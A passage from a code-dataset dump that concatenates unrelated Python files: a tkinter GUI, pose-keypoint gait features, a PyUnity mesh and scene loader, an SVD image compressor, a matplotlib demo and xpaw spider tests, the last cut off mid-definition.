self.button1.grid(row=0,column=0)\n self.button2.grid(row=0, column=1)\n self.button3.grid(row=1, column=0)\n self.button4.grid(row=1, column=1)\n\nroot= Tk()\n#photo = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Home.png\")\n#label = Label(root,image=photo)\nlabel_1 = Label(root, text=\"Choose Your Fellow\", bg=\"white\", font=(\"Agency FB\", 25))\nlabel_1.pack(side=\"top\", anchor=N)\nphotoB = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Back.png\")\nphotoE = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Exit.png\")\nback = Button(root, bg=\"white\")\nback.config(image=photoB)\nquitButton = Button(root, command=root.quit, bg=\"white\")\nquitButton.config(image=photoE)\nback.pack(side=\"left\",anchor=NW)\nquitButton.pack(side=\"right\", anchor=NE)\n#label.pack(side=\"top\", anchor=N)\nphoto1 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Robo.png\")\nphoto2 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Kuro.png\")\nphoto3 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/BabyG.png\")\nphoto4 = PhotoImage(file=\"C:/Users/Reemy/Documents/GitHub/std_googleAssistant/GUI/Icons/Johnny.png\")\nb= GUI(root)\nroot.geometry(\"1000x920\")\nroot.title(\"Intelligent Fellow\")\nroot.configure(background='white')\nroot.mainloop()","sub_path":"GUI/AmnaCodes/Characters.py","file_name":"Characters.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"629049571","text":"\"\"\"\nAuthor: Md Mahedi Hasan\nDescription: Preprocess pose keypoints to find more gait features\nSteps to do\n 1. find each body joint coordinates\n 2. find limb length\n 3. find motion features\n\npose keypoints got 25 points (total = 75 elements, 25x3 (x, y and accuracy))\nbody join point = {\nNeck(1), \nRShoulder(2), RElbow(3), RWrist(4),\nLShoulder(5), LElbow(6), LWrist(7),\nMHip(8), \nRHip(9), RKnee(10), RAnkle(11), RHeel(24), RBigToe(22), RSmallToe(23)\nLHip(12), LKnee(13), LAnkle(14), LHeel(21), LBigToe(19), LSmallToe(20), \nNose(0),\nREye(15), LEye(16), \nREar(17), LEar(18), \nBack(25)}\n\"\"\"\n\nimport numpy as np\nimport math\n\n# nose\nx_cor_nose = (0 * 3); y_cor_nose = (x_cor_nose + 1)\n\n# neck\nx_cor_neck = (1 * 3); y_cor_neck = (x_cor_neck + 1)\n\n# hip\nx_cor_r_hip = (9 * 3); y_cor_r_hip = (x_cor_r_hip + 1)\nx_cor_mid_hip = (8 * 3); y_cor_mid_hip = (x_cor_mid_hip + 1)\nx_cor_l_hip = (12 * 3); y_cor_l_hip = (x_cor_l_hip + 1)\n\n# knee\nx_cor_r_knee = (10 * 3); y_cor_r_knee = (x_cor_r_knee + 1)\nx_cor_l_knee = (13 * 3); y_cor_l_knee = (x_cor_l_knee + 1)\n\n# ankle\nx_cor_r_ankle = (11 * 3); y_cor_r_ankle = (x_cor_r_ankle + 1)\nx_cor_l_ankle = (14 * 3); y_cor_l_ankle = (x_cor_l_ankle + 1)\n\n# BigToe\nx_cor_r_btoe = (22 * 3); y_cor_r_btoe = (x_cor_r_btoe + 1)\nx_cor_l_btoe = (19 * 3); y_cor_l_btoe = (x_cor_l_btoe + 1)\n\n# Wrist\nx_cor_r_wrist = (4 * 3); y_cor_r_wrist = (x_cor_r_wrist + 1)\nx_cor_l_wrist = (7 * 3); y_cor_l_wrist = (x_cor_l_wrist + 1)\n\n# Elbow\nx_cor_r_elbow = (3 * 3); y_cor_r_elbow = (x_cor_r_elbow + 1)\nx_cor_l_elbow = (6 * 3); y_cor_l_elbow = (x_cor_l_elbow + 1)\n\n# Shoulder\nx_cor_r_shoulder = (2 * 3); y_cor_r_shoulder = (x_cor_r_shoulder + 1)\nx_cor_l_shoulder = (5 * 3); y_cor_l_shoulder = (x_cor_l_shoulder + 1)\n\n\n\n#Trick to find partial body\ndef is_partial_body(body_kps):\n partial_body = False\n\n right_leg = body_kps[y_cor_r_ankle] - body_kps[y_cor_r_hip]\n left_leg = body_kps[y_cor_l_ankle] - body_kps[y_cor_l_hip]\n\n # for partial body pose\n # print(\"right leg: \", right_leg); print(\"left leg: \", left_leg)\n if(right_leg <= 0 or left_leg <= 0): partial_body = True\n return partial_body\n\n\n\n# normalize body keypoints according to PTSN paper \ndef normalize_keypoints(body_kps):\n\n body_joint = [9, 10, 11, 12, 13, 14, 21, 24, 2, 5] \n frame_kps = []\n \n # calculating distance between right_ankle and center of the hip\n unit_length = body_kps[y_cor_mid_hip] - body_kps[y_cor_neck]\n \n # for complete body pose select joints\n for b_j in body_joint:\n x_cor = b_j * 3\n y_cor = x_cor + 1\n \n # subtract join from the neck\n norm_x = (body_kps[x_cor] - body_kps[x_cor_neck]) \n norm_y = (body_kps[y_cor] - body_kps[y_cor_neck]) \n\n # without normalize\n #frame_kps.append(norm_x)\n #frame_kps.append(norm_y)\n\n # normalize\n frame_kps.append(norm_x / unit_length)\n frame_kps.append(norm_y / unit_length)\n\n return frame_kps\n\n\ndef get_distance(bkps, x1, y1, x2, y2):\n dist = np.sqrt((bkps[x1] - bkps[x2]) ** 2 + (bkps[y1] - bkps[y2]) ** 2)\n return dist\n\n\ndef get_body_limb(bkps):\n\n # feet\n r_feet = get_distance(bkps, x_cor_r_ankle, y_cor_r_ankle, \n x_cor_r_btoe, y_cor_r_btoe)\n\n l_feet = get_distance(bkps, x_cor_l_ankle, y_cor_l_ankle, \n x_cor_l_btoe, y_cor_l_btoe)\n\n # foot\n r_foot = get_distance(bkps, x_cor_r_ankle, y_cor_r_ankle, \n x_cor_r_knee, y_cor_r_knee)\n\n\n l_foot = get_distance(bkps, x_cor_l_ankle, y_cor_l_ankle, \n x_cor_l_knee, y_cor_l_knee)\n\n # run\n r_run = get_distance(bkps, x_cor_r_knee, y_cor_r_knee, \n x_cor_r_hip, y_cor_r_hip)\n\n l_run = get_distance(bkps, x_cor_l_knee, y_cor_l_knee, \n x_cor_l_hip, y_cor_l_hip)\n\n # body\n r_body = get_distance(bkps, x_cor_r_hip, y_cor_r_hip, \n x_cor_neck, y_cor_neck)\n\n l_body = get_distance(bkps, x_cor_l_hip, y_cor_l_hip, \n x_cor_neck, y_cor_neck)\n\n\n # hand\n r_hand = get_distance(bkps, x_cor_r_wrist, y_cor_r_wrist, \n x_cor_r_elbow, y_cor_r_elbow)\n\n l_hand = get_distance(bkps, x_cor_l_wrist, y_cor_l_wrist, \n x_cor_l_elbow, y_cor_l_elbow)\n\n # arm\n r_arm = get_distance(bkps, x_cor_r_elbow, y_cor_r_elbow, \n x_cor_r_shoulder, y_cor_r_shoulder)\n\n l_arm = get_distance(bkps, x_cor_l_elbow, y_cor_l_elbow, \n x_cor_l_shoulder, y_cor_l_shoulder)\n\n\n nose_to_neck = get_distance(bkps, x_cor_neck, y_cor_neck, \n x_cor_nose, y_cor_nose)\n\n hip = get_distance(bkps, x_cor_r_hip, y_cor_r_hip,\n x_cor_l_hip, y_cor_l_hip)\n\n l_shoulder = get_distance(bkps, x_cor_neck, y_cor_neck, \n x_cor_l_shoulder, y_cor_l_shoulder)\n\n r_shoulder = get_distance(bkps, x_cor_neck, y_cor_neck, \n x_cor_r_shoulder, y_cor_r_shoulder)\n\n pose_limb = [r_foot, l_foot,\n r_run, l_run, r_body, l_body,\n r_hand, l_hand, r_arm, l_arm,\n l_shoulder, r_shoulder, nose_to_neck, hip]\n \n\n return pose_limb\n\n\n\ndef get_motion_featurs(bkps_2, bkps_1):\n body_joint = [0, 1, 2, 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14] \n motion_features = []\n\n # for complete body pose of selected joints\n for b_j in body_joint:\n x_cor = b_j * 3\n y_cor = x_cor + 1\n \n motion_x = (bkps_2[x_cor] - bkps_1[x_cor]) \n motion_y = (bkps_2[y_cor] - bkps_1[y_cor]) \n\n # motion features\n motion_features.append(motion_x)\n motion_features.append(motion_y)\n\n return motion_features\n\n\ndef get_joint_angle(bkps):\n # first point lower, second point higher values\n joint_pair = [(0, 1), (1, 2), (1, 5), (2, 3), (3, 4), \n (5, 6), (6, 7), (1, 9), (1, 12), (9, 10),\n (10, 11), (12, 13), (13, 14)]\n \n angle_features = []\n for pair in joint_pair:\n del_x = bkps[(pair[1] * 3)] - bkps[(pair[0] * 3)] \n del_y = bkps[(pair[1] * 3) + 1] - bkps[(pair[0] * 3) + 1] \n\n if (del_x == 0):\n angle_features.append(math.pi / 2)\n else:\n angle_features.append(math.atan(del_y / del_x))\n\n return angle_features","sub_path":"hand_features_casiaA.py","file_name":"hand_features_casiaA.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"46293387","text":"\"\"\"\r\nUtility functions related to loading\r\nand saving PyUnity meshes and scenes.\r\n\r\nThis will be imported as ``pyunity.Loader``.\r\n\r\n\"\"\"\r\n\r\nfrom .vector3 import Vector3\r\nfrom .quaternion import Quaternion\r\nfrom .meshes import Mesh\r\nfrom .core import *\r\nfrom .scenes import SceneManager\r\nfrom .files import Behaviour, Project, Scripts\r\nfrom .render import Camera\r\nfrom .audio import AudioSource, AudioListener, AudioClip\r\nfrom .physics import AABBoxCollider, SphereCollider, Rigidbody # , PhysicMaterial\r\nfrom uuid import uuid4\r\nimport inspect\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\ndef LoadObj(filename):\r\n \"\"\"\r\n Loads a .obj file to a PyUnity mesh.\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n Name of file\r\n\r\n Returns\r\n -------\r\n Mesh\r\n A mesh of the object file\r\n\r\n \"\"\"\r\n vertices = []\r\n normals = []\r\n faces = []\r\n\r\n for line in open(filename, \"r\"):\r\n if line.startswith(\"#\"):\r\n continue\r\n values = line.split()\r\n if not values:\r\n continue\r\n if values[0] == \"v\":\r\n v = Vector3(float(values[1]), float(values[3]), float(values[2]))\r\n vertices.append(v)\r\n elif values[0] == \"f\":\r\n face = []\r\n for v in values[1:]:\r\n w = v.split(\"/\")\r\n face.append(int(w[0]) - 1)\r\n face.reverse()\r\n faces.append(face)\r\n\r\n for face in faces:\r\n a = vertices[face[2]] - vertices[face[1]]\r\n b = vertices[face[0]] - vertices[face[1]]\r\n normal = a.cross(b).normalized()\r\n normals.append(normal)\r\n\r\n return Mesh(vertices, faces, normals)\r\n\r\ndef SaveObj(mesh, name, filePath=None):\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n with open(os.path.join(directory, name + \".obj\"), \"w+\") as f:\r\n for vertex in mesh.verts:\r\n f.write(\"v \" + \" \".join(map(str, round(vertex, 8))) + \"\\n\")\r\n for normal in mesh.normals:\r\n f.write(\"vn \" + \" \".join(map(str, round(normal, 8))) + \"\\n\")\r\n for face in mesh.triangles:\r\n face = \" \".join([\r\n str(face[0] + 1) + \"//\" + str(face[0] + 1),\r\n str(face[1] + 1) + \"//\" + str(face[1] + 1),\r\n str(face[2] + 1) + \"//\" + str(face[2] + 1),\r\n ])\r\n f.write(\"f \" + face + \"\\n\")\r\n\r\ndef LoadMesh(filename):\r\n \"\"\"\r\n Loads a .mesh file generated by\r\n `SaveMesh`. It is optimized for faster\r\n loading.\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n Name of file relative to the cwd\r\n\r\n Returns\r\n -------\r\n Mesh\r\n Generated mesh\r\n\r\n \"\"\"\r\n with open(filename, \"r\") as f:\r\n lines = list(map(lambda x: x.rstrip(), f.readlines()))\r\n if \"\" in lines:\r\n lines.remove(\"\")\r\n\r\n vertices = list(map(float, lines[0].split(\"/\")))\r\n vertices = [\r\n Vector3(vertices[i], vertices[i + 1], vertices[i + 2]) for i in range(0, len(vertices), 3)\r\n ]\r\n faces = list(map(int, lines[1].split(\"/\")))\r\n faces = [\r\n [faces[i], faces[i + 1], faces[i + 2]] for i in range(0, len(faces), 3)\r\n ]\r\n normals = list(map(float, lines[2].split(\"/\")))\r\n normals = [\r\n Vector3(normals[i], normals[i + 1], normals[i + 2]) for i in range(0, len(normals), 3)\r\n ]\r\n texcoords = list(map(float, lines[3].split(\"/\")))\r\n texcoords = [\r\n [texcoords[i], texcoords[i + 1]] for i in range(0, len(texcoords), 2)\r\n ]\r\n return Mesh(vertices, faces, normals, texcoords)\r\n\r\ndef SaveMesh(mesh, name, filePath=None):\r\n \"\"\"\r\n Saves a mesh to a .mesh file\r\n for faster loading.\r\n\r\n Parameters\r\n ----------\r\n mesh : Mesh\r\n Mesh to save\r\n name : str\r\n Name of the mesh\r\n filePath : str, optional\r\n Pass in `__file__` to save in\r\n directory of script, otherwise\r\n pass in the path of where you\r\n want to save the file. For example, if you\r\n want to save in C:\\Downloads, then give\r\n \"C:\\Downloads\\mesh.mesh\". If not\r\n specified, then the mesh is saved\r\n in the cwd.\r\n\r\n \"\"\"\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n with open(os.path.join(directory, name + \".mesh\"), \"w+\") as f:\r\n i = 0\r\n for vertex in mesh.verts:\r\n i += 1\r\n f.write(str(round(vertex.x, 8)) + \"/\")\r\n f.write(str(round(vertex.y, 8)) + \"/\")\r\n f.write(str(round(vertex.z, 8)))\r\n if i != len(mesh.verts):\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\n i = 0\r\n for triangle in mesh.triangles:\r\n i += 1\r\n j = 0\r\n for item in triangle:\r\n j += 1\r\n f.write(str(item))\r\n if i != len(mesh.triangles) or j != 3:\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\n i = 0\r\n for normal in mesh.normals:\r\n i += 1\r\n f.write(str(round(normal.x, 8)) + \"/\")\r\n f.write(str(round(normal.y, 8)) + \"/\")\r\n f.write(str(round(normal.z, 8)))\r\n if i != len(mesh.normals):\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\n i = 0\r\n for texcoord in mesh.texcoords:\r\n i += 1\r\n f.write(str(texcoord[0]) + \"/\")\r\n f.write(str(texcoord[1]))\r\n if i != len(mesh.texcoords):\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\ndef GetImports(file):\r\n with open(file) as f:\r\n lines = f.read().rstrip().splitlines()\r\n imports = []\r\n for line in lines:\r\n line = line.lstrip()\r\n if line.startswith(\"import\") or (line.startswith(\"from\") and \" import \" in line):\r\n imports.append(line)\r\n return \"\\n\".join(imports) + \"\\n\\n\"\r\n\r\ndef SaveSceneToProject(scene, filePath=None, name=None):\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n if name is None:\r\n directory = os.path.join(directory, scene.name)\r\n else:\r\n directory = os.path.join(directory, name)\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n project = Project(directory, scene.name)\r\n\r\n project.import_file(os.path.join(\"Scenes\", scene.name + \".scene\"), None)\r\n SaveScene(scene, directory, project)\r\n return project\r\n\r\ndef SaveAllScenes(name, filePath=None):\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n directory = os.path.join(directory, name)\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n project = Project(directory, name)\r\n\r\n for scene in SceneManager.scenesByIndex:\r\n SaveScene(scene, directory, project)\r\n project.import_file(os.path.join(\r\n \"Scenes\", scene.name + \".scene\"), None)\r\n project.write_project()\r\n return project\r\n\r\ndef SaveScene(scene, directory, project):\r\n os.makedirs(os.path.join(directory, \"Scenes\"), exist_ok=True)\r\n f = open(os.path.join(directory, \"Scenes\", scene.name + \".scene\"), \"w+\")\r\n f.write(\"Scene : \" + str(uuid4()) + \"\\n\")\r\n f.write(\" name: \" + json.dumps(scene.name) + \"\\n\")\r\n\r\n ids = {}\r\n for gameObject in scene.gameObjects:\r\n uuid = str(uuid4())\r\n\r\n ids[id(gameObject)] = uuid\r\n f.write(\"GameObject : \" + uuid + \"\\n\")\r\n f.write(\" name: \" + json.dumps(gameObject.name) + \"\\n\")\r\n f.write(\" tag: \" + str(gameObject.tag.tag) + \"\\n\")\r\n\r\n uuid = str(uuid4())\r\n\r\n ids[id(gameObject.transform)] = uuid\r\n\r\n f.write(\" transform: \" + uuid + \"\\n\")\r\n\r\n # 2nd pass (for components)\r\n for gameObject in scene.gameObjects:\r\n for component in gameObject.components:\r\n if id(component) in ids:\r\n uuid = ids[id(component)]\r\n else:\r\n uuid = str(uuid4())\r\n ids[id(component)] = uuid\r\n if issubclass(type(component), Behaviour):\r\n name = type(component).__name__ + \"(Behaviour)\"\r\n path = os.path.join(directory, \"Scripts\",\r\n type(component).__name__ + \".py\")\r\n os.makedirs(os.path.dirname(path), exist_ok=True)\r\n with open(path, \"w+\") as f2:\r\n f2.write(GetImports(inspect.getfile(type(component))))\r\n f2.write(inspect.getsource(type(component)))\r\n project.import_file(os.path.join(\"Scripts\", type(\r\n component).__name__ + \".py\"), \"Behaviour\", uuid)\r\n else:\r\n name = type(component).__name__ + \"(Component)\"\r\n f.write(name + \" : \" + uuid + \"\\n\")\r\n\r\n f.write(\" gameObject: \" + ids[id(gameObject)] + \"\\n\")\r\n for attr in component.shown:\r\n value = getattr(component, attr)\r\n if id(value) in ids:\r\n written = ids[id(value)]\r\n elif isinstance(value, Mesh):\r\n written = str(uuid4())\r\n SaveMesh(value, gameObject.name, os.path.join(\r\n directory, \"Meshes\", gameObject.name + \".mesh\"))\r\n project.import_file(os.path.join(\r\n \"Meshes\", gameObject.name + \".mesh\"), \"Mesh\", written)\r\n ids[id(value)] = written\r\n elif isinstance(value, Material):\r\n written = str(uuid4())\r\n project.save_mat(value, gameObject.name)\r\n project.import_file(os.path.join(\r\n \"Materials\", gameObject.name + \".mat\"), \"Material\", written)\r\n ids[id(value)] = written\r\n elif isinstance(value, AudioClip):\r\n written = str(uuid4())\r\n os.makedirs(os.path.join(\r\n directory, \"Sounds\"), exist_ok=True)\r\n shutil.copy(value.path, os.path.join(directory,\r\n \"Sounds\", os.path.basename(value.path)))\r\n project.import_file(os.path.join(\"Sounds\",\r\n os.path.basename(value.path)), written)\r\n ids[id(value)] = written\r\n else:\r\n written = str(value)\r\n f.write(\" \" + attr + \": \" + written + \"\\n\")\r\n\r\n project.write_project()\r\n\r\nclass ObjectInfo:\r\n def __init__(self, uuid, type, attrs):\r\n self.uuid = uuid\r\n self.type = type\r\n self.attrs = attrs\r\n\r\n def __getattr__(self, attr):\r\n return self.attrs[attr]\r\n\r\n\r\ncomponents = {\r\n \"Transform\": Transform,\r\n \"Camera\": Camera,\r\n \"Light\": Light,\r\n \"MeshRenderer\": MeshRenderer,\r\n \"AABBoxCollider\": AABBoxCollider,\r\n \"SphereCollider\": SphereCollider,\r\n \"Rigidbody\": Rigidbody,\r\n \"AudioSource\": AudioSource,\r\n \"AudioListener\": AudioListener\r\n}\r\n\"\"\"List of all components by name\"\"\"\r\n\r\ndef parse_string(string):\r\n if string.startswith(\"Vector3(\"):\r\n return True, Vector3(*list(map(float, string[8:-1].split(\", \"))))\r\n if string.startswith(\"Quaternion(\"):\r\n return True, Quaternion(*list(map(float, string[11:-1].split(\", \"))))\r\n if string in [\"True\", \"False\"]:\r\n return True, string == \"True\"\r\n if string == \"None\":\r\n return True, None\r\n if string.isdigit():\r\n return True, int(string)\r\n try:\r\n return True, float(string)\r\n except (ValueError, OverflowError):\r\n pass\r\n try:\r\n return True, json.loads(string)\r\n except json.decoder.JSONDecodeError:\r\n pass\r\n if string.startswith(\"(\") and string.endswith(\")\"):\r\n check, items = zip(*list(map(parse_string, string.split(\", \"))))\r\n if all(check):\r\n return True, tuple(items)\r\n if string.startswith(\"[\") and string.endswith(\"]\"):\r\n check, items = zip(*list(map(parse_string, string[1:-1].split(\", \"))))\r\n if all(check):\r\n return True, list(items)\r\n return False, None\r\n\r\ndef LoadProject(filePath):\r\n project = Project.from_folder(filePath)\r\n\r\n scenes = [value[1]\r\n for value in project.files.values() if value[0].type == \"Scene\"]\r\n for path in scenes:\r\n with open(os.path.join(project.path, path), \"r\") as f:\r\n lines = f.read().rstrip().splitlines()\r\n\r\n data = []\r\n for line in lines:\r\n if not line.startswith(\" \"):\r\n data.append([line])\r\n else:\r\n data[-1].append(line)\r\n\r\n infos = []\r\n for info in data:\r\n type_, uuid = info[0].split(\" : \")\r\n attrs = {attr: value for attr, value in map(\r\n lambda x: x[4:].split(\": \"), info[1:])}\r\n infos.append(ObjectInfo(uuid, type_, attrs))\r\n\r\n gameObjectInfo = list(filter(lambda x: x.type == \"GameObject\", infos))\r\n componentInfo = list(filter(lambda x: \"(Component)\" in x.type, infos))\r\n behaviourInfo = list(filter(lambda x: \"(Behaviour)\" in x.type, infos))\r\n\r\n scene_info = infos.pop(0)\r\n scene = SceneManager.AddBareScene(json.loads(scene_info.name))\r\n\r\n ids = {}\r\n\r\n gameObjects = []\r\n for info in gameObjectInfo:\r\n gameObject = GameObject.BareObject(json.loads(info.name))\r\n gameObjects.append(gameObject)\r\n gameObject.tag = Tag(int(info.tag))\r\n ids[info.uuid] = gameObject\r\n\r\n for info in componentInfo:\r\n gameObject = ids[info.gameObject]\r\n del info.attrs[\"gameObject\"]\r\n component = components[info.type[:-11]]\r\n component = gameObject.AddComponent(component)\r\n ids[info.uuid] = component\r\n for name, value in reversed(info.attrs.items()):\r\n check, obj = parse_string(value)\r\n if check:\r\n setattr(component, name, obj)\r\n elif value in ids:\r\n setattr(component, name, ids[value])\r\n elif value in project.files:\r\n file = project.files[value][0]\r\n if file.type == \"Material\":\r\n obj = project.load_mat(file)\r\n elif file.type == \"Mesh\":\r\n obj = LoadMesh(os.path.join(project.path, file.path))\r\n elif file.type == \"Ogg\":\r\n obj = AudioClip(os.path.join(project.path, file.path))\r\n setattr(component, name, obj)\r\n\r\n script = Scripts.LoadScripts(os.path.join(filePath, \"Scripts\"))\r\n for info in behaviourInfo:\r\n gameObject = ids[info.gameObject]\r\n del info.attrs[\"gameObject\"]\r\n behaviour = gameObject.AddComponent(\r\n getattr(script, info.type[:-11]))\r\n for name, value in reversed(info.attrs.items()):\r\n check, obj = parse_string(value)\r\n if check:\r\n setattr(behaviour, name, obj)\r\n elif value in ids:\r\n setattr(behaviour, name, ids[value])\r\n elif value in project.files:\r\n file = project.files[value][0]\r\n if file.type == \"Material\":\r\n obj = project.load_mat(file)\r\n elif file.type == \"Mesh\":\r\n obj = LoadMesh(os.path.join(project.path, file.path))\r\n elif file.type == \"Ogg\":\r\n obj = AudioClip(os.path.join(project.path, file.path))\r\n setattr(behaviour, name, obj)\r\n\r\n for gameObject in gameObjects:\r\n scene.Add(gameObject)\r\n\r\n scene.mainCamera = scene.FindGameObjectsByName(\r\n \"Main Camera\")[0].GetComponent(Camera)\r\n\r\n return project\r\n\r\nclass Primitives:\r\n \"\"\"\r\n Primitive preloaded meshes.\r\n Do not instantiate this class.\r\n\r\n \"\"\"\r\n\r\n __path = os.path.dirname(os.path.abspath(__file__))\r\n cube = LoadMesh(os.path.join(__path, \"primitives/cube.mesh\"))\r\n quad = LoadMesh(os.path.join(__path, \"primitives/quad.mesh\"))\r\n double_quad = LoadMesh(os.path.join(__path, \"primitives/double_quad.mesh\"))\r\n sphere = LoadMesh(os.path.join(__path, \"primitives/sphere.mesh\"))\r\n capsule = LoadMesh(os.path.join(__path, \"primitives/capsule.mesh\"))\r\n cylinder = LoadMesh(os.path.join(__path, \"primitives/cylinder.mesh\"))\r\n","sub_path":"pyunity/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":16692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"291024056","text":"# Python 3.5.2 with anaconda-numpy\n\nimport numpy as np\nimport os\nimport shutil\n\ntry: shutil.rmtree('compressed_matrices/')\nexcept OSError: print('making new folder')\nos.mkdir('compressed_matrices')\n\nf = open('control.txt', 'r')\nimagename = next(f).split()[-1].strip()\nterms = tuple(next(f).split(':')[-1].strip().split(', '))\n\n\ndef diagonal_insertion(vector, dim):\n cols, rows = dim\n\n result = []\n blank_vector = [0 for _ in range(cols)]\n for i in range(rows):\n sigma_vector = blank_vector[:]\n if i < cols:\n sigma_vector[i] = vector[i]\n result.append(sigma_vector)\n return np.matrix(result, dtype='int')\n\ndef compress(filename, terms=10):\n\n file = open('uncompressed/{}'.format(filename), 'r').read()[:-2] # strips trailing ';\\n'\n\n A = np.matrix(file)\n\n n, M = A.shape\n globals()['dimensions'] = n, M\n\n u, sigma_vals, v = np.linalg.svd(A)\n\n assert n >= terms\n sigma_vals[terms:] = [0 for _ in range(n-terms)]\n\n sigma = diagonal_insertion(sigma_vals, (M, n))\n\n return u @ sigma @ v\n\ndef compress_all_layers(terms):\n\n folder = 'compressed_matrices/' + str(terms) + '/'\n\n try:\n os.mkdir(folder)\n except FileExistsError:\n pass\n\n for filename in ('red.txt', 'blue.txt', 'green.txt'):\n result = compress(filename, terms=terms)\n\n outfile = open(folder+filename, 'w')\n for line in result.tolist():\n for v in line:\n v = min(255, max(0, int(v+.5))) # whole number 0 to 255\n outfile.write(str(v).ljust(4))\n outfile.write('\\n')\n\n\n n,M = globals()['dimensions']\n open(folder+'info', 'w').write('''picture is {}x{} pixels\n\n {} of {} possible terms used\n {} bytes needed for this representation.\n compared to {} bytes needed for the non-compressed image\n a total savings of {:.2f}%\n '''.format(M, n, terms, min(M, n), terms + terms * (n + M), n*M,\n 100*(1- (terms + terms * (n + M))/(n*M)))\n )\n\nfor t in terms:\n print('compressing with {} terms'.format(t))\n compress_all_layers(int(t))\n\nprint('all images compressed to matrices, run to begin png generation')","sub_path":"SVD_decomp 2/compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"340109810","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef f(t):\n return np.exp(-t) * np.cos(2*np.pi*t)\n\n\nplt.plot([1,2,3,4])\nplt.ylabel('some numbers')\nplt.show()\n\n# evenly sampled time at 200ms intervals\nt = np.arange(0., 5., 0.2)\n\n# red dashes, blue squares and green triangles\nplt.plot(t, t, 'r--', t, t**2, 'bs', t, t**3, 'g^')\nplt.show()\n\nt1 = np.arange(0.0, 5.0, 0.1)\nt2 = np.arange(0.0, 5.0, 0.02)\n\nplt.figure()\nplt.subplot(211)\nplt.plot(t1, f(t1), 'bo', t2, f(t2), 'k')\n\nplt.subplot(212)\nplt.plot(t2, np.cos(2*np.pi*t2), 'r--')\nplt.show()","sub_path":"matplotlibtest.py","file_name":"matplotlibtest.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"530054285","text":"# coding=utf-8\n\nfrom os.path import join, exists\nimport asyncio\nimport os\nimport signal\nimport time\nfrom threading import Thread\n\nfrom xpaw.spider import Spider\nfrom xpaw.http import HttpRequest\nfrom xpaw.queue import PriorityQueue\nfrom xpaw.run import run_spider\nfrom xpaw.item import Item\nfrom xpaw.errors import IgnoreItem\n\n\nclass StartRequestSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/')\n\n async def parse(self, response):\n pass\n\n\nclass BadQueue(PriorityQueue):\n async def pop(self):\n await super().pop()\n raise RuntimeError('not an error actually')\n\n\nclass BadQueue2(PriorityQueue):\n async def pop(self):\n raise RuntimeError('not an error actually')\n\n\ndef test_coro_terminated():\n run_spider(StartRequestSpider, downloader_clients=2, queue=BadQueue, max_retry_times=0)\n\n\ndef test_coro_terminated2():\n run_spider(StartRequestSpider, downloader_clients=2, queue=BadQueue2, max_retry_times=0)\n\n\nclass ToKillSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/')\n\n async def parse(self, response):\n while True:\n await asyncio.sleep(5)\n\n\nclass ExceptionThread(Thread):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.bucket = []\n\n def run(self):\n try:\n super().run()\n except Exception as e:\n self.bucket.append(e)\n raise\n\n\ndef test_kill_spider(tmpdir):\n pid_file = join(str(tmpdir), 'pid')\n log_file = join(str(tmpdir), 'log')\n t = ExceptionThread(target=kill_spider, args=(pid_file,))\n t.start()\n run_spider(ToKillSpider, pid_file=pid_file, log_file=log_file)\n t.join()\n assert len(t.bucket) == 0, 'Exception in thread'\n\n\ndef _check_pid(pid):\n try:\n os.kill(pid, 0)\n except OSError:\n return False\n else:\n return True\n\n\ndef kill_spider(pid_file):\n t = 10\n while t > 0 and not exists(pid_file):\n t -= 1\n time.sleep(1)\n assert t > 0\n with open(pid_file, 'rb') as f:\n pid = int(f.read().decode())\n assert _check_pid(pid) is True\n os.kill(pid, signal.SIGTERM)\n t = 10\n while t > 0 and exists(pid_file):\n t -= 1\n time.sleep(1)\n assert t > 0\n\n\nclass FooError(Exception):\n pass\n\n\nclass HandlerDownloaderMiddleware:\n def handle_request(self, request):\n if request.url.endswith('error'):\n raise FooError\n\n\nclass HandlerSpiderMiddleware:\n def handle_spider_input(self, response):\n if response.request.url.endswith('not-found'):\n raise FooError\n\n def handle_spider_error(self, response, error):\n if isinstance(error, FooError):\n return ()\n\n\nclass HandlerSpider(Spider):\n def 